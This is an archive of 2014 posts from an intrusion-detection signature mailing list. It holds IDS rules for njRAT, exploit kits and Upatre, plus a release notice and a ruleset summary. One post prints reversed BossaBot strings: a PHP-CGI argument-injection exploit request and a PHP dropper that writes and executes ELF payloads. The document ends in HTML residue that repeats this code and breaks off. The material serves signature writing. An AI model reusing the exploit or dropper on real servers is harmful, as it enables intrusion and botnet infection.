Patrick Olsen | 23 Sep 15:08 2014

njrat version 0.7d sigs

All,

I downloaded the njrat version 0.7d builder this evening and generated a range of activities with it. I ran the latest ET trojan rules (specifically looking at ET TROJAN Bladabindi/njrat CnC) against two pcaps I have and didn't get any hits on them. I believe where the rules are falling short is the depth values that are set. They trigger on a few of them if you remove it. In either case I re-wrote the rules. 

They would only trigger if I had -k none (Checksum mode set to none). This was the case with a live pcap and my test/controlled pcap. 

The hash referenced is the archive of the njrat builder. You can download it from VT.

I decided to break them out by the command issued (e.g. Keylogging). All the return values are base64 encoded.

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)"; flow:from_client,established; content:!"GET|20|"; content:"|FF D8 FF E0 00 10 4A 46 49 46|"; fast_pattern; content:"|00|CAP|7c 27 7c 27 7c|"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100001; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Microphone)"; flow:from_client,established; content:"|00|MIC|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100002; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)"; flow:from_client,established; content:"|00|MSG|7c 27 7c 27 7c|"; fast_pattern; content:"Executed As"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100003; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Remote Shell)"; flow:from_client,established; content:"|00|rs|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100004; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Services Listing)"; flow:from_client,established; content:"|00|srv|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100005; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Registry Listing)"; flow:from_client,established; content:"|00|RG|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100006; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Process Listing)"; flow:from_client,established; content:"|00|proc|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100007; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (File Manager Actions)"; flow:from_client,established; content:"|00|fm|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100008; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Keylogging)"; flow:from_client,established; content:"|00|kl|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100009; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback"; flow:from_client,established; content:"|00|ll|7C 27 7C 27 7C|"; fast_pattern; content:"0.7d"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100010; rev:1;)

Thanks,

Patrick
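As an added worked example (not part of Patrick's post or of the ET ruleset): a small Python checker that applies the same `|00|<cmd>|7C 27 7C 27 7C|` tokens the rules above key on to a raw byte stream, and, for analysis, splits that stream into frames and base64-decodes the return values as the post describes. The length-prefix framing (ASCII decimal length, a NUL, then the body), the `frame()` builder and the sample frames are assumptions constructed here, not taken from a capture.

```python
import base64
import binascii
import re

# The |7C 27 7C 27 7C| field delimiter every rule in the post keys on.
SEP = b"|'|'|"

# Command tag -> category, taken from the msg fields of the rules in the post.
COMMANDS = {
    b"CAP": "Capture",
    b"MIC": "Microphone",
    b"MSG": "Message",
    b"rs": "Remote Shell",
    b"srv": "Services Listing",
    b"RG": "Registry Listing",
    b"proc": "Process Listing",
    b"fm": "File Manager Actions",
    b"kl": "Keylogging",
    b"ll": "CnC Callback",
}

# Equivalent of the rules' content matches: a NUL, the tag, then the delimiter.
TOKEN_RE = re.compile(
    rb"\x00(" + b"|".join(re.escape(c) for c in COMMANDS) + rb")\|'\|'\|"
)


def scan_stream(stream: bytes) -> list:
    """What the IDS rules see: every NUL+tag+delimiter token in a raw byte
    stream, mapped to its rule category. (The `ll` rule additionally wants
    the "0.7d" string; that second content match is not modelled here.)"""
    return [COMMANDS[m.group(1)] for m in TOKEN_RE.finditer(stream)]


def split_frames(stream: bytes) -> list:
    """ASSUMED framing for the constructed sample: ASCII decimal body length,
    one NUL byte, then `length` bytes of body. Malformed input raises instead
    of being guessed at, so a truncated capture is reported, not misparsed."""
    frames, pos = [], 0
    while pos < len(stream):
        nul = stream.find(b"\x00", pos)
        if nul < 0 or not stream[pos:nul].isdigit():
            raise ValueError("bad length prefix at offset %d" % pos)
        length = int(stream[pos:nul])
        body = stream[nul + 1 : nul + 1 + length]
        if len(body) != length:
            raise ValueError("truncated frame at offset %d" % nul)
        frames.append(body)
        pos = nul + 1 + length
    return frames


def try_b64(field: bytes):
    """Return the decoded bytes if `field` is strict base64, else None."""
    try:
        return base64.b64decode(field, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_frames(stream: bytes) -> list:
    """Analysis view: per frame, the command tag, its rule category, the raw
    delimiter-separated fields and a base64-decoded copy of each field."""
    parsed = []
    for body in split_frames(stream):
        cmd, _, rest = body.partition(SEP)
        fields = rest.split(SEP) if rest else []
        parsed.append({
            "cmd": cmd,
            "category": COMMANDS.get(cmd, "unknown"),
            "fields": fields,
            "decoded": [try_b64(f) for f in fields],
        })
    return parsed


def frame(cmd: bytes, *fields: bytes) -> bytes:
    """Build one frame under the assumed framing (only used to construct
    the sample stream below)."""
    body = SEP.join((cmd,) + fields)
    return str(len(body)).encode() + b"\x00" + body


# Constructed sample stream: three frames using tags from the rules, plus one
# with a made-up tag (b"xyz") that no rule covers.
SAMPLE = (
    frame(b"kl", base64.b64encode(b"typed text"))
    + frame(b"proc", base64.b64encode(b"explorer.exe"))
    + frame(b"ll", b"0.7d")
    + frame(b"xyz", b"n/a")
)

if __name__ == "__main__":
    print("rule hits:", scan_stream(SAMPLE))
    for f in parse_frames(SAMPLE):
        print(f["cmd"], f["category"], f["decoded"])
```

`scan_stream` is the rule-level view (does the token appear anywhere in the bytes), while `parse_frames` is what you would run on a pcap payload when writing or tuning such rules: it shows which return values really are base64 and which fields, like the "0.7d" version string, are plain text and can be matched directly.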
Victor Julien | 23 Sep 13:35 2014

Suricata 2.0.4 Available!

The OISF development team is pleased to announce Suricata 2.0.4. This
release fixes a number of issues in the 2.0 series.

This update fixes a bug in the SSH parser, where a malformed banner
could lead to evasion of SSH rules and missing log entries. In some
cases it may also lead to a crash. Bug discovered and reported by
Steffen Bauch.

Additionally, this release also addresses a new IPv6 issue that can lead
to evasion. Bug discovered by Rafael Schaefer working with ERNW GmbH.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz

Changes

- Bug #1276: ipv6 defrag issue with routing headers
- Bug #1278: ssh banner parser issue
- Bug #1254: sig parsing crash on malformed rev keyword
- Bug #1267: issue with ipv6 logging
- Bug #1273: Lua - http.request_line not working
- Bug #1284: AF_PACKET IPS mode not logging drops and stream inline issue

Security

- CVE-2014-6603

Special thanks

We'd like to thank the following people and corporations for their
contributions and feedback:

- Rafael Schaefer working with ERNW GmbH
- Steffen Bauch - @steffenbauch, http://steffenbauch.de/
- Bill Meeks

Known issues & missing features

If you encounter issues, please let us know! As always, we are doing our
best to make you aware of continuing development and items within the
engine that are not yet complete or optimal. With this in mind, please
notice the list we have included of known items we are working on. See
http://redmine.openinfosecfoundation.org/projects/suricata/issues for an
up to date list and to report new issues. See
http://redmine.openinfosecfoundation.org/projects/suricata/wiki/Known_issues
for a discussion and time line for the major issues.

About Suricata

Suricata is a high performance Network IDS, IPS and Network Security
Monitoring engine. Open Source and owned by a community run non-profit
foundation, the Open Information Security Foundation (OISF). Suricata is
developed by the OISF, its supporting vendors and the community.
--

-- 
---------------------------------------------
Victor Julien
http://www.inliniac.net/
PGP: http://www.inliniac.net/victorjulien.asc
---------------------------------------------

Kevin Ross | 23 Sep 10:57 2014

SIGS: Sweet Orange and Angler

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Sweet Orange Exploit Kit Traffic Gate"; flow:established,to_server; content:"/k?t="; http_uri; depth:5; pcre:"/^\x2Fk\x3Ft\x3D\d{10}$/U"; classtype:trojan-activity; reference:url,www.malware-traffic-analysis.net/2014/09/19/index.html; sid:193311; rev:1;)

# Seen this in many examples going back to at least late May/June, so it looks pretty consistent.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET CURRENT_EVENTS Angler Exploit Kit Fake HTTP Headers"; flow:established,to_client; content:"Expires|3A| Sat, 26 Jul 1997 05|3A|00|3A|00 GMT"; http_header; content:"Last-Modified|3A| Sat, 26 Jul 2040 05|3A|00|3A|00 GMT"; http_header; fast_pattern:15,20; classtype:trojan-activity; reference:url,www.malware-traffic-analysis.net/2014/09/22/index.html; sid:193312; rev:1;)

Kind Regards,
Kevin Ross
Russell Fulton | 23 Sep 05:04 2014

duplicate rules -- sort of...

I am using the etpro 2.0.3 rules and I find that there are:

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"ET SCAN LibSSH Based SSH Connection - Often used as a BruteForce Tool"; flow:established,to_server; content:"SSH-"; content:"libssh"; within:20; threshold: type limit, track by_src, count 1, seconds 30; reference:url,doc.emergingthreats.net/2006435; classtype:misc-activity; sid:2006435; rev:6;)

alert ssh $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN LibSSH2 Based SSH Connection - Often used as a BruteForce Tool"; flow:established,to_server; ssh.softwareversion:"libssh2-"; threshold: type limit, track by_src, count 1, seconds 30; classtype:misc-activity; sid:2018689; rev:2;)

Both of which are triggering. I take it the latter is taking advantage of the app-layer decoding. Is it an oversight that the former rule is still enabled?

Russell
Francis Trudeau | 22 Sep 23:31 2014

Daily Ruleset Update Summary 09/22/2014

 [***] Summary: [***]

 12 new Open signatures, 20 new Pro (12+8).  Linux/BillGates, Various Android, Nuclear EK.

 Thanks:  @MalwareMustDie and @abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2019202 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 2 (trojan.rules)
  2019203 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 3 (trojan.rules)
  2019204 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) (trojan.rules)
  2019205 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (KINS C2) (trojan.rules)
  2019206 - ET TROJAN ABUSE.CH SSL Fingerprint Blacklist Malicious SSL certificate detected (KINS CnC) (trojan.rules)
  2019207 - ET TROJAN Linux/BillGates Checkin (trojan.rules)
  2019208 - ET TROJAN Linux/BillGates Checkin Response (trojan.rules)
  2019209 - ET CURRENT_EVENTS DRIVEBY Nuclear EK PDF Struct (no alert) (current_events.rules)
  2019210 - ET CURRENT_EVENTS DRIVEBY Nuclear EK PDF (current_events.rules)
  2019211 - ET TROJAN Win32/Badur.igh Checkin 2 (trojan.rules)
  2019212 - ET TROJAN Bossabot DDoS tool RFI attempt (trojan.rules)
  2019213 - ET CURRENT_EVENTS Possible Dyre SSL Cert Sept 22 2014 (current_events.rules)

 Pro:

  2808861 - ETPRO TROJAN Likely Win32/Spy.Zbot.AAQ .onion Proxy DNS lookup (trojan.rules)
  2808862 - ETPRO MOBILE_MALWARE Android.Trojan.FakeInst.BX Checkin 4 (mobile_malware.rules)
  2808863 - ETPRO TROJAN TROJAN Win32/Seey.A Checkin (trojan.rules)
  2808864 - ETPRO MOBILE_MALWARE Android/InfoStealer.BL Checkin via SMTP (mobile_malware.rules)
  2808865 - ETPRO TROJAN TROJAN Win32/Seey.A User-Agent (trojan.rules)
  2808866 - ETPRO TROJAN TROJAN Win32/Seey.A Checkin 2 (trojan.rules)
  2808867 - ETPRO WEB_CLIENT Possible Adobe Reader CVE-2014-0567 (web_client.rules)
  2808868 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Opfake.a Checkin 10 (mobile_malware.rules)

 [///]     Modified active rules:     [///]

  2019134 - ET CURRENT_EVENTS Flashpack Redirect Method 2 (current_events.rules)
  2019172 - ET TROJAN Linux.DDoS Checkin (trojan.rules)
  2019177 - ET TROJAN Linux/AES.DDoS Sending Real/Fake CPU&BW Info (trojan.rules)
  2019185 - ET CURRENT_EVENTS Nuclear EK Gate Sep 16 2014 (current_events.rules)
  2807357 - ETPRO MOBILE_MALWARE Android/TrojanSMS.Agent.SD Checkin (mobile_malware.rules)
  2808659 - ETPRO CURRENT_EVENTS FlashPack URI Struct Thread 2 Specific (current_events.rules)
  2808843 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.kh Checkin 2 (mobile_malware.rules)
  2808844 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.kh Response 2 (mobile_malware.rules)

 [---]         Removed rules:         [---]

  2403321 - ET CINS Active Threat Intelligence Poor Reputation IP group 22 (ciarmy.rules)
  2405062 - ET CNC Shadowserver Reported CnC Server Port 58914 Group 1 (botcc.portgrouped.rules)
  2803491 - ETPRO TROJAN Suspicious HTTP STOP Return - Trojan.Win32.FakeAV.cfty or Related Controller (trojan.rules)
  2807626 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) (trojan.rules)
  2807683 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 2 (trojan.rules)
  2807710 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 3 (trojan.rules)
Packet Sleuth | 22 Sep 14:28 2014

Upatre change

Attempted to send this late Friday, but it failed.  Wanted to get it in.  Haven't had time to test them yet.  This is being reported as Upatre by some of the AV vendors when submitted to Virus Total.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Upatre Suspicious User-Agent (Installer) with IP Host"; flow:established,to_server; content:"User-Agent|3a20|Installer|0d0a|"; nocase; http_header; pcre:"/^User-Agent\x3a\sInstaller\r\nHost\x3a\s\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype:trojan-activity; sid:xxxxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET TROJAN Upatre downloading purported Tar file"; flow:to_client,established; content:"Content-Type|3a20|application/x-tar|0d0a|"; nocase; http_header; content:"Vary|3a20|"; nocase; http_header; pcre:"/Vary\x3a\x20(Accept-Encoding,)?User-Agent\r\n\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype:trojan-activity; sid:xxxxxx; rev:1;)

Regards,
Packet Sleuth
Hendrik Adrian | 22 Sep 03:09 2014

Request #3 - ET Signature for Linux Bossabot

Hello Will,
CC: ..and ET friends,

There is one more request. A route of the Kaiten base code DDoS'er was recoded into an active evil botnet (IRC based); the actor calls it BossaBot. Assisting Mr. Malekal Morte, I am in charge of reversing the ELF binaries, since the first time the RFI attack and the botnet were spotted in some forum.

These are good chronological references for the threat:
Malekal's report: http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/
My reversing in monitoring this ELF threat: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965
Spiderlabs posted about this threat too: http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
...according to the posts above you will see that the threat is important to handle.

If the ET sigs don't cover this threat yet, I would like to request an ET sig to block this RFI and the PHP infection (or "injection" is more like it). If you think you already have one, please see the details below, in case anything can be improved.

The problem with this proposal is that, since the botnet attack request can only be activated from the actor's IRC, it is a bit difficult to simulate the attack to make a good capture PCAP (I tried many times), so there is no PCAP. But we have THREE pieces of information that can be used in place of the PCAP to generate sigs, as follows:

(1) RFI and web file injection HTTP header injected log.

The log is available here: http://pastebin.com/raw.php?i=KUTT2UQa (@undeadsecurity did good work recording this; credit to them)

(2) The latest ELF binary I reversed, spotted 2 days ago, contains the below data hard coded in the bins:

// RFI TO BE SENT HARD CODED:

.rodata:0x0408540 aPostS?2d64616c
.rodata:0x0408540   db 'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
.rodata:0x0408540   db '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
.rodata:0x0408540   db 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
.rodata:0x0408540   db '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
.rodata:0x0408540   db '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
.rodata:0x0408540   db '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
.rodata:0x0408540   db '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
.rodata:0x0408540   db '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
.rodata:0x0408540   db '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
.rodata:0x0408540   db '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
.rodata:0x0408540   db '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
.rodata:0x0408540   db '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
.rodata:0x0408540   db '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
.rodata:0x0408540   db '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
.rodata:0x0408540   db '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
.rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah

// ALSO THE ACCOMPANIED DROPPER SCRIPT

.rodata:0x0408540   db 'Host: %s',0Dh,0Ah
.rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '
.rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
.rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
.rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
.rodata:0x0408540   db 'Connection: close',0Dh,0Ah
.rodata:0x0408540   db 0Dh,0Ah
.rodata:0x0408540   db '%s',0
.rodata:0x04089D5   align 8
   
:
.rodata:0x04089D8 a?phpBufferfSBu
.rodata:0x04089D8   db '<?php',0Ah          ;
.rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
.rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
.rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
.rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
.rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
.rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
.rodata:0x04089D8   db '{',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}else{',0Ah
.rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
.rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
.rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}',0Ah
.rodata:0x04089D8   db '?>',0Ah,0
.rodata:0x0408CE9   align 10h

Using the above (1) and (2), the hard coded HTTP header can be used for blocking by ET sigs.
Moreover, there is one more vector to use for filtering (below):

(3) The injected ELF file to the /tmp directory

<?php
$bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
$bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';

↑ the above "$bufferf =" and "$bufferf2 =" look like a good spot to filter. But only the new version is using this; the old version is using a different scheme (without PHP injection, but a PHP system command to wget the bins..)

If you need more confirmation, please do not hesitate to ask.
It would be nice if this threat could also be blocked.

Herewith I close the series of requests for ET sigs from MalwareMustDie, a total of 3 DDoS botnet signatures. Looking forward to the reply; thank you in advance.

Best regards always/Rick

--
Hendrik Adrian / @unixfreaxjp
PGP/MIT.EDU: RSA 2048/0xEC61AB9
http://about.me/unixfreaxjp

MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie

This email is confidential and may be legally privileged. It is intended
as a confidential communication only for the person(s) named above.
Any other use or disclosure is prohibited.
If you have received this message in error, please delete it, disregard its contents.
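As an added worked example (not part of Hendrik's post or of any ET signature): a Python script that renders the hard-coded POST template from (2) the way the bot's sprintf would, URL-decodes the query string, and applies the check a signature for this traffic relies on, namely that the query string carries php-cgi `-d` ini directives and contains no literal `=`. The target path "/index.php", the `inspect_request_line` helper and the benign comparison queries are constructed here; the `=` rule comes from RFC 3875 section 4.4 (a query string with no unencoded `=` is passed to the CGI program as command-line arguments), which is why the template percent-encodes every `=`.

```python
import re
from urllib.parse import unquote_plus

# printf-style template copied from the .rodata strings in the post: the
# bot substitutes the target path for %s, and %% is a literal percent sign.
RFI_TEMPLATE = (
    'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
    '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
    'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
    '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
    '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
    '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
    '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
    '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
    '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
    '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
    '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
    '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
    '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
    '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
    '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
    'D%%6E HTTP/1.1'
)

# One php-cgi ini directive: -d name=value (value may be a quoted string).
DIRECTIVE_RE = re.compile(r'-d\s+([A-Za-z_.]+)=("[^"]*"|\S+)')


def render_request_line(path: str) -> str:
    """Mimic the bot's sprintf: %s becomes the path, %% becomes %."""
    return RFI_TEMPLATE % (path,)


def split_request_line(line: str):
    """Method, request-target and version; the raw target has no spaces
    because the bot encodes them as '+'."""
    method, target, version = line.split(" ")
    return method, target, version


def split_target(target: str):
    path, _, query = target.partition("?")
    return path, query


def php_cgi_directives(decoded_query: str) -> list:
    """All (name, value) -d directives in an already URL-decoded query."""
    return DIRECTIVE_RE.findall(decoded_query)


def is_php_cgi_arg_injection(raw_query: str) -> bool:
    """php-cgi receives the query string as argv only when it holds no
    literal '=' (RFC 3875 s.4.4). Flag a query with no literal '=' that,
    once decoded, starts with an option and carries -d ini directives."""
    if "=" in raw_query:
        return False
    decoded = unquote_plus(raw_query)
    return decoded.lstrip().startswith("-") and bool(php_cgi_directives(decoded))


def inspect_request_line(line: str) -> dict:
    """Constructed helper: everything a rule writer wants from one request line."""
    method, target, _ = split_request_line(line)
    path, query = split_target(target)
    decoded = unquote_plus(query)
    return {
        "method": method,
        "path": path,
        "decoded_query": decoded,
        "injection": is_php_cgi_arg_injection(query),
        "directives": php_cgi_directives(decoded),
    }


if __name__ == "__main__":
    info = inspect_request_line(render_request_line("/index.php"))
    print("arg injection:", info["injection"])
    for name, value in info["directives"]:
        print("  -d", name, "=", value)
```

The decoded view is what to match on when the raw bytes are awkward: every `=` in this traffic arrives as `%3D`, so a rule keyed on the literal directive text must either use a decoded buffer or match the percent-encoded form exactly as it appears in the template.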
"/$Vos03apkyec2"))'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'{'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'exit(1);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'}else{'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'echo($Vdkqrxiiyr3t);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf = base64_decode($bufferf);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'$bufferf2 = base64_decode($bufferf2);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span 
class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span 